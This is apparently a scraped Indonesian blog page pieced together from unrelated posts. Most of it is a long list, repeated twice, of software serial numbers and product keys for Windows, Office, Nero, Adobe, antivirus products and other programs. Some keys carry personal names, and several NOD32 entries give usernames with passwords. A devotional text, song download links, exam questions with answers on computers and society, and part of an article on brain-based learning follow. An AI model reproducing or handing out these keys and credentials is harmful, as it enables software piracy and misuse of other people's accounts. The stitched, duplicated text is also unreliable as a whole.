KGFVY-7733B-8WCK9-KTG64-BC7D8
Microsoft Windows XP Profesional SP 2
WGP2M-G8M6T-BT7D4-P7RY7-27K76
VYKFM-8WQD3-PQC2R-MB9YV-X3JFG
k2kb2-bdbgv-kp686-d8t7x-hdmq8
Microsoft Windows XP Professional
S/N: FCKGW RHQQ2 YXRKT 8TG6W 2B7Q8
Microsoft Office 2007 Enterprise
KGFVY-7733B-8WCK9-KTG64-BC7D8
Microsoft Windows Vista Ultimate
YFKBB-PQJJV-G996G-VWGXY-2V3X8
Windows Vista
YFKBB-PQJJV-G996G-VWGXY-2V3X8
Microsoft Windows Vista 2006
Name: cristi suta
S/N: TCP8W-T8PQJ-WWRRH-QH76C-99FBW
Nero 7 Premium Reloaded v7.5.9.0A
1C80-0000-19E5-MA2X-4001-1324-3931
1C80-0000-19E5-MA2X-4008-6459-9954
1C80-0000-19E5-MA2X-4008-9974-0906
1C80-0000-19E5-MA2X-4005-9931-5336
1C80-0000-19E5-MA2X-4008-5823-0671
Nero 7 Premium Reloaded v7.8.5.0
1C80-0000-19E5-MA2X-4003-8871-9910
Nero 7 Premium Reloaded v7.7.5.1
1C82-0020-19E5-M45X-0FFF-93D9-0BD4
1C82-0020-19E5-M45X-0FFF-GC89-D3N4
1C82-0020-19E5-M45X-0FFF-2X95-1I5J
1C82-0020-19E5-M45X-0FFF-ARA0-0ASR
1C82-0020-19E5-M45X-0FFF-7RLG-K8G7
Nero 7 Premium Reloaded v7.5.9.1
1C81-0020-19E5-M31X-E42S-D217-7935
Nero Burning Rom v.5044
1500-0001-0053-0316-2508-6123
Nero Burning Rom v.5.5.5.1 for WinXP
1503-0947-6845-2627-4181-1200
NERO 6
1A23-0006-7130-1204-8976-4901
NERO 6.3
1A25-0006-7130-1352-4239-7903
NERO 6.6
1A25-0006-7130-1827-2429-2198
NERO 7.7.5.1 PREMIUM ED
1C80-0014-19E5-MA2X-400C-4X27-4A50
Norton AntiVirus 2007
Product Key: V4FHRMHYH7PR8FF9PY46J3DDC Activation: XHHCWFWH7KTC
NOD32 All Serials Any
S/N: Name: AV-2364945
S/N: jubqqrjsa2Name: AV-2267079Password : m7auys7jphUser: AV-2593035Password: merjvieno1Name: AV-2230918Serial: 48rf4ieot2″Username: En-2007224 Password: nx1qs5myj6Name: FiENdisH_MBS/N: Name: AV-2267079Pastry all…
Power DVD 5.0
MV588995988G2285
Power DVD 7.0
Name: S.M Nafis Akhtar
S/N: WTGC3-SBR8C-PWFXA-HAG87-UPXH6-RAYKE 7SJRX-LBFMF-JUH8A-UD88Y-KUNT2-EXUNQ-6XDFP-HRXSM-4J4ZU-C2XBU-EG384-MEEVFGMJLS-EWEUU-TDAGH-R7XUU-JNG4X-KPFXR
SpeedUpMyPC v3.0
00XHEH-M5TY2P-QEZJWB-V8UUHN
Spyware Doctor 4.0.0.2618
Name: craig martindaleS/N: A962-19A8-4171-D2BE-0BAF-5010-7810-23C0-7577-6FFE
Super DVD Creator v9.30
SDCMM-124272-881221-362392-341621
SDCMM-064745-114192-730109-921381
SDCMM-112154-175236-561511-642441
SDCMM-625237-169174-441194-723975
SDCMM-431046-156136-178255-201392
Spyware Doctor v5.0.0.147
Name : Thomas Grassmann
Serial : BFA2-D53B-A6C7-A08B-B95E-C2DD-30F4-8E64-49CF-7E10
Tune UP Utilites 2008 Free
Name : Merc {REA}
Comp : Team REA
Serial :
BG9UX-YU8NC-1D84W-BQ9GG-47XBN-GAANJ
N5QVM-TJBA3-CHGBB-VN5ED-2VEEV-6BSYN
BVU9X-A8DQE-75Y6U-PXV97-QHBTY-GBSN6
GJX91-X2X4Q-GQQAN-F7R79G8EM-CFSNU
23NF9-ALT3M-L1YYU-HEMJF-QYS6W
Trojan Remover v6.5.5
Username: Nancy Stephens
Licence Key: 000015-YBW39A-9BFFWM-GA26J3-15HY2T-XGDJQT-4U7VNA-ZC4TMG-J4JVN0-WQHD66
TuneUp Utilities 2007 v6.0.1255.0
Name :BUBlic
Company :TSRh
Serial :6THVJ-XKL6J-XV6L3-8EP52-FBDF8-SFSXU
Uniblue Registry Booster v1.3
00X242-JJ5YYP-5Z8Z6C-7570NG
WINDOWS VISTA :
Windows Vista Business —- J9QVT-JJMB9-RVJ38-M8KT6-DMT9M
Windows Vista Home Basic — KJTCW-YQGRK-XPQMR-YTQG8-DKVG6
Windows Vista Home Basic N — YQWWH-2YD6Y-V3K2X-H4H8V-WJ8WT
Windows Vista Home Premium — PYYBC-K9XT9-V92KD-6CT89-4VB82
Windows Vista Ultimate —- PVVFY-2F78Q-8T7M8-HDQB2-BR3YT
Windows Vista Enterprise —- CYD8T-QHBMC-6RCMK-4GHRD-CRRB7
Windows Vista 2006
Name: cristi suta
S/N: TCP8W-T8PQJ-WWRRH-QH76C-99FBW
Windows XP :
Windows XP Home Edition K —- W8F6Q-HM3JB-2XRHD-7Q92J-XKY6W
Windows XP Home Edition KN — M9D9J-2TQV2-FBJQP-2M8G8-DGQ26
Windows XP Media Center Edition — H23CJ-2WXM9-M9D2K-42226-DJWRD
Windows XP Professional Edition K — FRH2X-6VD7F-YH2TV-2V8B7-J46F6
Windows XP Professional Edition KN - QKBGY-T8JFG-F448Q-24KR9-48XPJ
Windows XP Home Edition —- GHGCP-3KFC6-Y4J4D-MVG7V-67TV6
Windows XP Professional —– F9QV9-HDYR3-6QDR4-PGVW9-GTBBJ
Windows XP Professional IA64 Edition - BGVXG-CM3VK-FX848-B9JPY-YJJXD
Windows XP Professional x64 Edition - PFFY7-Y9RRY-MT6C7-XMQPK-RWFCW
Windows XP Tablet PC Edition — WFMYK-68Y2T-JD473-W8DMW-8PFHQ
WINDOWS 2000 :
Windows 2000 Professional —- DDTPV-TXMX7-BBGJ9-WGY8K-B9GHM
Windows 2000 Server (All Versions) — KRJQ8-RQ822-YRMXF-6TTXC-HD2VM
Xingtone Ringtone Maker v5.0.0
PI74-1013-GABQ-3306
Your Uninstaller! Pro 2006 v5.0.0.259
Name: PAUL J DEVENZIO
Code: 000016-QA36H2-XW5PPB-6RB7J2-BZ1FJ8-KJQBE9-C2F81Q-FKFEAN-Y5WFRP-EPMHYT
TRANSTOOL 5
100706-27816-08499520-03
Universal Translator
EWB3APACDVBGYT2ENZJX
ULEAD COOL 3D STUDIO
274A5-11085-78578888
ULEAD MEDIA STUDIO PRO 7.0
011A2-27042-0190DCN14
ULEAD MOVIE FACORY 2.0
111A2-62000-00300082
ULEAD PHOTO IMPACT XL
111A3-08500-00002098
ULEAD VIDEO STUDIO 7
RORA2-870RO-ROROROR1
ULEAD PHOTO IMPACT
11103-07000-00001531S
VCD CUTER V.4.03 RETAIL
017697-023393
VISUAL BASIC 5.0
425-1689004
VISUAL BASIC 6 PRO
422-1111111
VISIO 2003
WFDWY-XQXJF-RHRYG-BG7RQ-BBHDM
SN : 110-12345678 CD Key : S4ED6W
ACDSee 4.0 Winall.Regged
654-237-149-322-681-441
ACDSee 4.01
148-817-607-012-681-441 / 711-108-595-288-491-441
ACDSee 5.0
581-076-451-038-881-441
ACDSee 5.0 PowerPack
382-936-064-050-881-441
ACDSee 5.0 Standar
664-828-790-472-030-541
ACDSee 6.0 PowerPack
147-755-260-960-487-541
ACDSee 7.0.43 POWER
4WBDGK-KVP87-F23BT8-JWRN8P8
ACDSee 9.0 BUILD 5.5
DYWDLK-PS6C7-W39CLK-GL9TL23
ACDSee Pro 2.0.219
DB4DVH-3348T-3CLHF7-JB5Y5DZ
Adobe Illustrator 10
1034-1003-4400-0000-1115-2040
Adobe Pagemaker 6.52
03W652R3818820-549
Autocad 2000
Serial : 112-11111111 CD Key : 5X8NUG.
Autocad 2002
Serial : 400-12345678. CD Key : T4ED6P
Borland C++ Builder v.4.0 for Windows
Number : 3448. A Key : 86×8-19×0
COREL Print House 6
PH06WRD-0020403-WQ
COREL R.A.V.E 2
RA02WRD- 0001311-CHE
CORELDRAW 10
D10NR-32542-53T76
CORELDRRAW 11
DR11CRD-0012082-DGW
CORELDRAW 12
DR12WEX-1504397-KTY
WinZip 11 Pro
Name: FIKRUL SETIAWAN
S/N: QARY5-QFLGE-1AQA0-XTJ40-1P358-7LCY3
Adobe Acrobat v8.0 Professional
1118-1341-3925-5595-8141-7680
1016-1992-9210-9981-1392-2870
1118-1719-9236-6727-3285-3211
1016-1757-9008-0389-1405-2509
1118-1295-7743-3899-5988-7217
1016-1553-1956-8803-7545-2920
Adobe Photoshop 6
PWWW600R7105467-948
Adobe Photoshop 7
1045-0203-3247-2217-3566-6177
Adobe Photoshop 8/CS
s/n: ANGKA 1 SEMUA
Adobe Photoshop CS2 v9.0
S/N: 1045-0436-9551-0266-5984-9386
Adobe Photoshop Lightroom v1.0
116044770382008492207154
116045641847731830470143
116045913624002835701237
116047564730034623372249
116040029137790379586954
Adobe Photoshop Lightroom v1.0
1160-4301-7977-0221-2925-0568
Macromedia Dreamweaver 4
DWW400-03771-57289-73501
Macromedia Dreamweaver MX 2004
WPD700-58202-88194-29915
Macromedia Director 8.5
WDW850-02044-87235-26420
Macromedia Freand 11
FHW110-02426-47231-55458
Macromedia Fireworks 4
FWW400-02666-67248-0254
Macromedia Coldfusion MX
CPD600-08480-B7213-22568
Macromedia Flash MX
FLW600-09531-57240-83750
Cyberlink PowerDVD Deluxe v7.0.2211
MMWJC-FRW4Z-677TV-YC8US-ZLYV3-KPW7B
WE8LG-MENE9-QGNVQ-LNPCF-F5AVD-8URP5
28FC9-URJA8-NDJA5-QVPQJ-EEB4M-2FZQM
GLRGH-A6CS6-X8BTA-CGA6A-KHDCK-4KUW4
TGRZP-QQQUU-X49A5-HC9KJ-QSA8S-9PMMP
CyberLink PowerDVD 7
S/N: WTGC3-SBR8C-PWFXA-HAG87-UPXH6-RAYKE 7SJRX-LBFMF-JUH8A-UD88Y-KUNT2-EXUNQ 6XDFP-HRXSM-4J4ZU-C2XBU-EG384-MEEVFGMJLS-EWEUU-TDAGH-R7XUU-JNG4X-KPFXR 824RZ-WQA6F-RBVAM-5W9N8-EX3HL-QDU42
CYBERLINK DVDSUITE PRO V.5
MS595725518122J4
FLASH 5
FLW500-03143-77238-80660
FLASH 6
FLW600-11335-72240-33333
FLASH MX
FLW600-53733-75540-61552
HOY QUR’AN 7,1
N1A6-N0A9
COREL PRINT HOUSE 6
PH06WRD-0020403-WQF
DELPHI 5
111-111-1111 CODE= FEX1-91X0
DELPHI 6
Z9J8-PUM4N-C6GZQ CDKEY= RW2-7JW
DELPHI 7
GAKD-PD29Q9-RDF?JQ-X65Z
CD KEY = QY8.EEC
Dfx Winamp 8
Email: rabcodemax@yahoo.com
Serial number: MA2443456
DSL Speed v3.8
User Name : TEAM TBE
Serial : PDDI33L6JTW6
Google Earth Pro
Name: Shinder Jandu
S/N: JCPM7DVNY6MRE3G
Password: 123456789
Kaspersky 6.0
S/N: tybgedtyhr4rthtyh
Kaspersky Internet Security v6.0.1.411
DZ3A3-7XGVU-DH1YX-NXJYP
Microsoft Office 2003
GWH28-DGCMP-P6RC4-6J4MT-3HFDY
Microsoft Frontpage 2003
WFDWY-XQXJF-RHRYG-BG7RQ-BBDHM
Folder Lock 5.7.3
Name: james smith
S/N: 343944892
Counter-Strike
5Z62E-MTXQZ-Z32IY-NW2ZL-A3C4Q
Microsoft Office 2007
KGFVY-7733B-8WCK9-KTG64-BC7D8
Microsoft Office 2007 Pro
TT3M8-H3469-V89G6-8FWK7-D3Q9Q
Microsoft Office Professional 2007 Enterprise
KGFVY-7733B-8WCK9-KTG64-BC7D8
Microsoft Windows XP Profesional SP 2
WGP2M-G8M6T-BT7D4-P7RY7-27K76
VYKFM-8WQD3-PQC2R-MB9YV-X3JFG
k2kb2-bdbgv-kp686-d8t7x-hdmq8
Microsoft Windows XP Professional
S/N: FCKGW RHQQ2 YXRKT 8TG6W 2B7Q8
Microsoft Office 2007 Enterprise
KGFVY-7733B-8WCK9-KTG64-BC7D8
Microsoft Windows Vista Ultimate
YFKBB-PQJJV-G996G-VWGXY-2V3X8
Windows Vista
YFKBB-PQJJV-G996G-VWGXY-2V3X8
Microsoft Windows Vista 2006
Name: cristi suta
S/N: TCP8W-T8PQJ-WWRRH-QH76C-99FBW
Nero 7 Premium Reloaded v7.5.9.0A
1C80-0000-19E5-MA2X-4001-1324-3931
1C80-0000-19E5-MA2X-4008-6459-9954
1C80-0000-19E5-MA2X-4008-9974-0906
1C80-0000-19E5-MA2X-4005-9931-5336
1C80-0000-19E5-MA2X-4008-5823-0671
Nero 7 Premium Reloaded v7.8.5.0
1C80-0000-19E5-MA2X-4003-8871-9910
Nero 7 Premium Reloaded v7.7.5.1
1C82-0020-19E5-M45X-0FFF-93D9-0BD4
1C82-0020-19E5-M45X-0FFF-GC89-D3N4
1C82-0020-19E5-M45X-0FFF-2X95-1I5J
1C82-0020-19E5-M45X-0FFF-ARA0-0ASR
1C82-0020-19E5-M45X-0FFF-7RLG-K8G7
Nero 7 Premium Reloaded v7.5.9.1
1C81-0020-19E5-M31X-E42S-D217-7935
Nero Burning Rom v.5044
1500-0001-0053-0316-2508-6123
Nero Burning Rom v.5.5.5.1 for WinXP
1503-0947-6845-2627-4181-1200
NERO 6
1A23-0006-7130-1204-8976-4901
NERO 6.3
1A25-0006-7130-1352-4239-7903
NERO 6.6
1A25-0006-7130-1827-2429-2198
NERO 7.7.5.1 PREMIUM ED
1C80-0014-19E5-MA2X-400C-4X27-4A50
Norton AntiVirus 2007
Product Key: V4FHRMHYH7PR8FF9PY46J3DDC Activation: XHHCWFWH7KTC
NOD32 All Serials Any
S/N: Name: AV-2364945
S/N: jubqqrjsa2Name: AV-2267079Password : m7auys7jphUser: AV-2593035Password: merjvieno1Name: AV-2230918Serial: 48rf4ieot2″Username: En-2007224 Password: nx1qs5myj6Name: FiENdisH_MBS/N: Name: AV-2267079Pastry all…
Power DVD 5.0
MV588995988G2285
Power DVD 7.0
Name: S.M Nafis Akhtar
S/N: WTGC3-SBR8C-PWFXA-HAG87-UPXH6-RAYKE 7SJRX-LBFMF-JUH8A-UD88Y-KUNT2-EXUNQ-6XDFP-HRXSM-4J4ZU-C2XBU-EG384-MEEVFGMJLS-EWEUU-TDAGH-R7XUU-JNG4X-KPFXR
SpeedUpMyPC v3.0
00XHEH-M5TY2P-QEZJWB-V8UUHN
Spyware Doctor 4.0.0.2618
Name: craig martindaleS/N: A962-19A8-4171-D2BE-0BAF-5010-7810-23C0-7577-6FFE
Super DVD Creator v9.30
SDCMM-124272-881221-362392-341621
SDCMM-064745-114192-730109-921381
SDCMM-112154-175236-561511-642441
SDCMM-625237-169174-441194-723975
SDCMM-431046-156136-178255-201392
Spyware Doctor v5.0.0.147
Name : Thomas Grassmann
Serial : BFA2-D53B-A6C7-A08B-B95E-C2DD-30F4-8E64-49CF-7E10
Tune UP Utilites 2008 Free
Name : Merc {REA}
Comp : Team REA
Serial :
BG9UX-YU8NC-1D84W-BQ9GG-47XBN-GAANJ
N5QVM-TJBA3-CHGBB-VN5ED-2VEEV-6BSYN
BVU9X-A8DQE-75Y6U-PXV97-QHBTY-GBSN6
GJX91-X2X4Q-GQQAN-F7R79G8EM-CFSNU
23NF9-ALT3M-L1YYU-HEMJF-QYS6W
Trojan Remover v6.5.5
Username: Nancy Stephens
Licence Key: 000015-YBW39A-9BFFWM-GA26J3-15HY2T-XGDJQT-4U7VNA-ZC4TMG-J4JVN0-WQHD66
TuneUp Utilities 2007 v6.0.1255.0
Name :BUBlic
Company :TSRh
Serial :6THVJ-XKL6J-XV6L3-8EP52-FBDF8-SFSXU
Uniblue Registry Booster v1.3
00X242-JJ5YYP-5Z8Z6C-7570NG
WINDOWS VISTA :
Windows Vista Business —- J9QVT-JJMB9-RVJ38-M8KT6-DMT9M
Windows Vista Home Basic — KJTCW-YQGRK-XPQMR-YTQG8-DKVG6
Windows Vista Home Basic N — YQWWH-2YD6Y-V3K2X-H4H8V-WJ8WT
Windows Vista Home Premium — PYYBC-K9XT9-V92KD-6CT89-4VB82
Windows Vista Ultimate —- PVVFY-2F78Q-8T7M8-HDQB2-BR3YT
Windows Vista Enterprise —- CYD8T-QHBMC-6RCMK-4GHRD-CRRB7
Windows Vista 2006
Name: cristi suta
S/N: TCP8W-T8PQJ-WWRRH-QH76C-99FBW
Windows XP :
Windows XP Home Edition K —- W8F6Q-HM3JB-2XRHD-7Q92J-XKY6W
Windows XP Home Edition KN — M9D9J-2TQV2-FBJQP-2M8G8-DGQ26
Windows XP Media Center Edition — H23CJ-2WXM9-M9D2K-42226-DJWRD
Windows XP Professional Edition K — FRH2X-6VD7F-YH2TV-2V8B7-J46F6
Windows XP Professional Edition KN - QKBGY-T8JFG-F448Q-24KR9-48XPJ
Windows XP Home Edition —- GHGCP-3KFC6-Y4J4D-MVG7V-67TV6
Windows XP Professional —– F9QV9-HDYR3-6QDR4-PGVW9-GTBBJ
Windows XP Professional IA64 Edition - BGVXG-CM3VK-FX848-B9JPY-YJJXD
Windows XP Professional x64 Edition - PFFY7-Y9RRY-MT6C7-XMQPK-RWFCW
Windows XP Tablet PC Edition — WFMYK-68Y2T-JD473-W8DMW-8PFHQ
WINDOWS 2000 :
Windows 2000 Professional —- DDTPV-TXMX7-BBGJ9-WGY8K-B9GHM
Windows 2000 Server (All Versions) — KRJQ8-RQ822-YRMXF-6TTXC-HD2VM
Xingtone Ringtone Maker v5.0.0
PI74-1013-GABQ-3306
Your Uninstaller! Pro 2006 v5.0.0.259
Name: PAUL J DEVENZIO
Code: 000016-QA36H2-XW5PPB-6RB7J2-BZ1FJ8-KJQBE9-C2F81Q-FKFEAN-Y5WFRP-EPMHYT
TRANSTOOL 5
100706-27816-08499520-03
Universal Translator
EWB3APACDVBGYT2ENZJX
ULEAD COOL 3D STUDIO
274A5-11085-78578888
ULEAD MEDIA STUDIO PRO 7.0
011A2-27042-0190DCN14
ULEAD MOVIE FACORY 2.0
111A2-62000-00300082
ULEAD PHOTO IMPACT XL
111A3-08500-00002098
ULEAD VIDEO STUDIO 7
RORA2-870RO-ROROROR1
ULEAD PHOTO IMPACT
11103-07000-00001531S
VCD CUTER V.4.03 RETAIL
017697-023393
VISUAL BASIC 5.0
425-1689004
VISUAL BASIC 6 PRO
422-1111111
VISIO 2003
WFDWY-XQXJF-RHRYG-BG7RQ-BBHDM
kenapa bunda menangis

SEORANG anak kecil bertanya pada Tuhannya, “Rabbi, mengapa bundaku sering menangis?”
Allah pun menjawab :
Karena ibumu seorang wanita …
Aku menciptakan wanita sebagai makhluk yang istimewa
Aku kuatkan bahunya untuk menyangga dunia
Aku lembutkan hatinya untuk memberi rasa aman
Aku kuatkan rahimnya untuk melahirkan benih manusia
Aku tabahkan pribadinya untuk terus berjuang saat orang lain menyerah
Aku beri dia rasa sensitif untuk mencintai putra-putrinya
Aku tanamkan rasa sayang yang akan meninabobokan anaknya
Aku beri dia kekuatan agar mampu memikul beban keluarga tanpa mengeluh
Aku kuatkan batinnya untuk tetap menyayangi meski disakiti
Aku beri dia keindahan untuk melindungi batin suaminya
Aku beri dia kebijaksanaan untuk mengerti bahwa suami yang baik takkan pernah menyakitinya
Bundamu, makhluk yang sangat kuat
Jika kau lihat bunda menangis,
Karena Aku beri dia air mata, yang bisa dia gunakan sewaktu-waktu untuk membasuh luka batinnya dan memberikan kekuatan baru
DOWNLOAD LAGU TERBARU 2010

LAGU ST12 TERBARUU
AKU PADAMU ST12 FEAT CHARLY ANGEL
KLIK DISINI
SETIAKU
KLIK DISINI
TERLALU
KLIK DISNI
ANUGERAH CINTA
KLIK DISNI
SESUTATU YANG MATI
KLIK DSINI
KEPEDIHAN JIWA
KLIK DISNI
THE BAGINDAS
CINTA
KLIK DISINI
SAYANG
KLIK DISNI
KANGEN
KLIK DISINI
DIMANA SUMPAHMU
KLIK ME
TAK SEINDAH MALAM KEMARIN
KLIK DISINI
DIHATIKU ADA NAMAMU
KLIK DISNI
DOWLOAD LAGU BARUNYA ZIGAZ TAR
KLIK DISINI

THE VIRGIN
LOVE STENGAH MATI
KLIK DISNI
BELAHAN JIWA
KLIK DISNI
CINTA
KLIK DISNI

Mulan Jameela Feat. Mitha The Virgin - Ya Allah
KLIK DISNI
Mulan Jamela feat Mita (The Virgin) - Cinta Mati
KLIK DISNI
kisi komas 2010

Program Studi : Teknik Informatika
Mata Kuliah : Komputer dan Masyarakat
Hari/ Tanggal :
Waktu : 100 Menit
Sifat : Tutup Buku
Dosen : Team Dosen
Jawablah 5 dari 9 pertanyaan dibawah ini dengan baik dan benar!
1. Penggunaan komputer dalam dunia usaha mendatangkan banyak manfaat, namun didalam masyarakat terjadi isu dan masalah terkait dengan adanya peralihan pekerjaan dari tenaga manusia menjadi tenaga mesin. Jelaskan isu dan masalah apa saja yang berkembang di masyarakat tersebut!
2. Mengapa diperlukan adanya suatu etika dan tanggung jawab professional dalam bidang teknologi informasi!
3. Sebutkan 8 perintah etika menggunakan internet!
4. Menurut pengamatan Anda, apakah penyebab terbesar maraknya pembajakan perangkat lunak di Indonesia. Dan tuliskan pula langkah yang paling tepat untuk upaya- upaya pencegahan maraknya pembajakan tersebut (min 4)!
5. Sebutkan tujuan perusahaan membangun situs komersial di Internet !
6. Jelaskan apa keuntungan dan kerugian pengolahan data terdistribusi !
7. a. Kenapa keamanan system informasi menjadi sesuatu yang sangat penting dalam setiap organisasi yang sudah terintegrasi di dunia internet
b. jelaskan apa yang dimaksud dengan pengembalian input, pengendalian proses, dan pengendalian output dalam hubungannya dengan keamanan system informasi
8. Apa yang dimaksud dengan privacy information dan kebebasan informasi ?
9. Sebutkan alasan kenapa cybercrime menjadi isu yang menarik dan kadang menyulitkan
dalam prosesnya di mata hukum !
jawaban KOMAS:
3. 8 perintah etika menggunakan internet :
1. Menghindari dan tidak mempublikasi informasi yang secara langsung berkaitan dengan masalah pornografi dan nudisme dalam segala bentuk.
2. Menghindari dan tidak mempublikasi informasi yang memiliki tendensi menyinggung secara langsung dan negatif masalah suku, agama dan ras (SARA), termasuk didalamnya usaha penghinaan, pelecehan, pendiskreditan, penyiksaan serta segala bentuk pelanggaran hak atas perseorangan, kelompok/ lembaga/ institusi lain.
3. Menghindari dan tidak mempublikasikan informasi yang berisi instruksi untuk melakukan perbuatan melawan hukum (illegal) positif di Indonesia dan ketentuan internasional umumnya.
4. Tidak menampilkan segala bentuk eksploitasi terhadap anak-anak dibawah umur.
5. Tidak mempergunakan, mempublikasikan dan atau saling bertukar materi dan informasi yang memiliki korelasi terhadap kegiatan pirating, hacking dan cracking.
6. Bila mempergunakan script, program, tulisan, gambar/foto, animasi, suara atau bentuk materi dan informasi lainnya yang bukan hasil karya sendiri harus mencantumkan identitas sumber dan pemilik hak cipta bila ada dan bersedia untuk melakukan pencabutan bila ada yang mengajukan keberatan serta bertanggung jawab atas segala konsekuensi yang mungkin timbul karenanya.
7. Tidak berusaha atau melakukan serangan teknis terhadap produk, sumberdaya (resource) dan peralatan yang dimiliki pihak lain.
8. Menghormati etika dan segala macam peraturan yang berlaku dimasyarakat internet umumnya dan bertanggungjawab sepenuhnya terhadap segala muatan/ isi situsnya.
9. Untuk kasus pelanggaran yang dilakukan oleh pengelola, anggota dapat melakukan teguran secara langsung.
4. penyebab terbesar maraknya pembajakan perangkat lunak di Indonesia. Dan tuliskan pula langkah yang paling tepat untuk upaya- upaya pencegahan maraknya pembajakan :
pembajak cukup mendompleng keberhasilan para pemegang merek dan paten tersebut dalam membangun image produk mereka. Pembajak juga tidak perlu melakukan investasi yang sangat mahal untuk keperluan kontrol kualitas, material yang berkualitas, riset dan pengembangan, dan pemasaran. Karenanya pembajak mampu menjual produknya jauh lebih murah dibandingkan produk yang asli. Kenyataan di atas menunjukkan juga bahwa pembajak mengabaikan kepentingan konsumen yang berkaitan dengan keselamatan
Upaya pencegahan maraknya pembajakan :
1. Warning strategy
Perusahaan pemegang merek asli memberikan peringatan secara aktif kepada para konsumennya terhadap produk perusahaan tersebut yang dipalsukan.
2. Withdrawal strategy
Perusahaan pemegang merek asli mengawasi dan memilih secara ketat distributor yang memasarkan produknya di pasar yang dicurigai produk bajakan sangat banyak dijual.
3. Prosecution strategy
Perusahaan pemegang merek asli melibatkan tim penyidik yang dibentuk oleh perusahaan sendiri untuk melakukan penyelidikan secara aktif tempat-tempat yang dicurigai sebgai pembuat produk palsu dari perusahaan tersebut.
4. Hands-Off strategy
Perusahaan pemegang merek asli membiarkan pembajakan produknya karena berbagai alasan.
5. Monitoring Strategy
Perusahaan pemegang merek asli memandang bahwa distributor adalah pemegang kunci penyebaran produk palsu dipasar. Karena itu, pendekatan dengan distributor untuk membangun loyalitas akan lebih efektif dalam menghentikan produk bajakan di pasar.
6. Consultation
Perusahaan pemegang merek asli melakukan peran aktif bekerjasama dengan lembaga pemerintah maupun dengan pemegang merek asli lainnya
4. Tujuan perusahaan membangun situs komersial di Internet :
a. Menarik konsumen baru melalui pemasaran dan periklanan Web.
b. Memperbaiki pelayanan konsumen yang sudah ada melalui fungsi pelayanan dan dukungan Web konsumen.
c. Mengembangkan saluran pemasaran dan distribusi berdasarkan Web yang baru
untuk produk yang sudah ada.
d. Mengembangkan informasi baru dari produk yang dapat diakses lewat Web.
9. Cybercrime menjadi isu yang menarik dan kadang menyulitkan karena:
• Kegiatan dunia cyber tidak dibatasi oleh teritorial negara
• Kegiatan dunia cyber relatif tidak berwujud
• Sulitnya pembuktian karena data elektronik relatif mudah untuk diubah, disadap, dipalsukan dan dikirimkan ke seluruh belahan dunia dalam hitungan detik
• Pelanggaran hak cipta dimungkinkan secara teknologi
• Sudah tidak memungkinkan lagi menggunakan hukum konvensional. Analogi masalahnya adalah mirip dengan kekagetan hukum konvensional dan aparat ketika awal mula terjadi pencurian listrik. Barang bukti yang dicuripun tidak memungkinkan dibawah ke ruang sidang. Demikian dengan apabila ada kejahatan dunia maya, pencurian bandwidth, dsb
Wednesday, July 14, 2010
CARA KERJA OTAK

PROSES BELAJAR BERDASARKAN KERJA OTAK
--------------------------------------------------------
PROSES BELAJAR BERDASARKAN KERJA OTAK Dr Siti Aminah Soepalarto, SpS
Bagian/ SMF Ilmu Penyakit Saraf, Subdivisi Saraf Anak RSHS/FK UNPAD Bandung
PENDAHULUAN
Saat ini kita sering mendengar terjadi krisis dibidang pendidikan. Mengapa hal ini dapat terjadi ?
Metode pembelajaran yang berlangsung saat ini dengan penyajian lebih menitik beratkan pada rangsangan dengar (auditory) berupa latihan
(drill), pengulangan, orientasinya detail, kurang melibatkan proses pemecahan suatu masalah, sangat sesuai dengan pola belajar pada otak kiri, dimana individu tersebut kurang hiperaktif dan tidak
mendapatkan terlalu banyak rangsangan.
Masalah mulai timbul karena pada generasi anak saat ini dimana dengan berkembangnya budaya, sejak kecil anak telah diberi banyak rangsang penglihatan (visual), misalnya rangsangan dari TV dll; sehingga pola pembelajaran anak bergeser kearah otak kanan dengan pola berpikir
secara visual dan lemah dalam menerima rangsang dengar (auditory)
tetapi mempunyai kemampuan untuk pemecahan masalah.
Hal ini mengakibatkan jurang antara anak didik dan guru menjadi lebar, karena pola pembelajaran disekolah tidak sesuai dengan pola
pembelajaran yang dibutuhkan; sekolah menjadi tidak sejalan dengan pikiran anak.
Sementara itu para pendidik yang umumnya adalah populasi dengan pola otak kiri, seperti juga pada dominasi otak kiri lainnya, mempunyai kelemahan berupa kesulitan untuk dapat memahami bahwa orang lain
mempunyai cara pandang yang berbeda dalam memproses keadaan. (Freed
1997)
Dalam makalah ini saya akan menguraikan mengenai proses belajar pada umumnya, perbedaan individu dengan otak kiri, otak kanan dan
keduanya, proses belajar pada otak kiri dan otak kanan.
I. PROSES BELAJAR (Njiokiktjien 1988)
Rangsangan yang masuk melalui indera, akan dipersepsikan (diartikan), kemudian secara selektif informasi tersebut disimpan. Proses penyimpanannya melibatkan kedua belahan otak.
Ditingkat pre-kategorikal, informasi tertentu (spesifik) akan
bertahan dalam waktu yang singkat (ingatan jangka pendek), untuk informasi yang dilihat ( visual) bertahan 200 ms, untuk informasi
yang didengar (auditory) bertahan 2000 ms. Ini merupakan bagian dari working memory.
Ditingkat katagorikal, informasi secara kompetitif dipahami, kemudian menuju bagian otak tertentu sesuai jenis informasi yang masuk.
Terjadi di working memory.
Informasi kemudian disimpan dalam ingatan jangka panjang; dan dapat direproduksi serta dapat dipanggil kembali (retrieval) atau direcall (diingat atau dikenali).
Langkah langkah proses informasi yang terjadi di working memori
berupa pengenalan, kebermaknaan dan direkam dalam waktu yang singkat. Di ingatan jangka pendek (short term memory) akan menampung unit
secara terbatas, informasi dicoding secara semantik (berdasarkan arti), berurutan dan untextuality
Memori disimpan dalam berbagai modalitas yaitu
Memori episodik (waktu kejadian)
memori semantik (diartikan); dapat dalam bentuk verbal fonologi
(suara dan bunyi) atau visual tekstual ( yang dilihat) Penyimpanan visual : konkrit
penyimpanan auditory : berurutan dan abstrak; ada 2 aspek yaitu verbal dan non verbal
Memori prosedural : mengetahui bagaimana melakukan memori deklaratif : mengetahui bahwa.
II. PERBEDAAN PADA INDIVIDU DENGAN OTAK KIRI, OTAK KANAN DAN KEDUA
OTAK. (Freed 1997)
A. INDIVIDU DENGAN OTAK KIRI
Informasi diproses secara dengar (auditory); Orang ini senang berbicara dan menuliskan sesuatu.
Informasi yang didapat sedikit-sedikit, untuk mengetahui sesuatu secara gambaran utuh.
Mudah menangkap peraturan peraturan pada mengeja, tata bahasa, pemisahan kata dan mudah memahami bahasa asing.
Pola berpikirnya runtut ( sequensial), sangat logis dan analitik, senang membuat daftar.
Senang membuat aturan dan menaati aturan.
Belajar lebih berhasil dengan mengetahui langkah demi langkah yang harus dikerjakan untuk menyelesaikan suatu pekerjaan dibanding bila didemonstrasikan.
Ingatan disimpan dalam bentuk nama dan kata kata dibandingkan dengan diimajinasikan.
